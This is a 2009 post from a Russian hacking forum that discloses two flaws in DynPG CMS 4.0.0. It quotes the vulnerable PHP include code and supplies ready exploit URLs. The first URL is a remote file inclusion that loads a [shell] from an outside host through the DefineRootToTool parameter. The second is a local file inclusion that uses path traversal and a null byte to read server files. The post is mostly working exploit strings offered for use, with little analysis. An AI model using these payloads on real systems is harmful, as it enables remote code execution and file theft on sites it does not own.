14.12.2009, 20:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
DynPG CMS 4.0.0
Web site : http://www.dynpg.org
Vesrion : 4.0.0
[Remote File Inclusion]
Vuln file: counter.php [str:15]
PHP код:
$inc = empty($_GET["inc"]) ? 0 : $_GET["inc"];
if ( !empty($inc) ) {
# Aufruf des Counters ьber einen Link. $inc enthдlt dann die Datenbankkennung!
$inc_or = htmlentities(urldecode($inc));
$inc_head = urldecode(str_replace('&', '&', $inc));
$inc = addslashes(strtolower($inc));
if ( empty($GLOBALS["DefineRootToTool"]) ) {
$GLOBALS["DefineRootToTool"] = "";
}
require_once $GLOBALS["DefineRootToTool"]."config.php";
Exploit:
if register_globals = ON && allow_url_include = ON
Код:
http://[host]/[path]/counter.php?inc=1&DefineRootToTool=[shell]?
[Local File Inclusion]
Vuln file: languages.inc.php [str:5]
PHP код:
global $lang_dpg;
require_once dirname(__FILE__) . '/plugins/languages.php';
require_once dirname(__FILE__) . '/localised/dynpg_backend/'.strtolower($_SESSION["LANGUAGE"]).'.lang.php';
Exploit:
if register_globals = ON && magic_quotes = OFF
Код:
http://[host]/[path]/languages.inc.php?_SESSION[LANGUAGE]=../../../../../../../../[local_file]%00
|
|
|